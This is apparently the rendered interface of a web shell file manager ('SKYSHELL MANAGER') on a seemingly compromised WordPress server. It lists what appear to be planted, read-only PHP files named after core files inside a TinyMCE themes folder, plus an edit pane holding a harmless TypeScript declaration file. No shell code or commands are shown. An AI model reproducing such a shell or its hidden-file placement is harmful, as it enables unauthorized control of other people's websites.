📁
SKYSHELL MANAGER
PHP v8.3.6
Create
Create
Path:
root
/
var
/
www
/
cstage
/
wp-includes
/
js
/
tinymce
/
themes
/
Name
Size
Perm
Actions
📁
inlite
-
0755
🗑️
🏷️
🔒
📁
modern
-
0755
🗑️
🏷️
🔒
📄
ms-files.php
6.83 KB
0444
🗑️
🏷️
⬇️
✏️
🔒
📄
wp-activate.php
6.83 KB
0444
🗑️
🏷️
⬇️
✏️
🔒
Edit: node.d.ts
import { readFileSync, writeFile } from 'fs'; import { format } from 'util'; declare const _default: { fs: { readFileSync: typeof readFileSync; writeFile: typeof writeFile; }; format: typeof format; resolve: (...paths: string[]) => string; exists: (file: string) => boolean; }; export default _default;
Save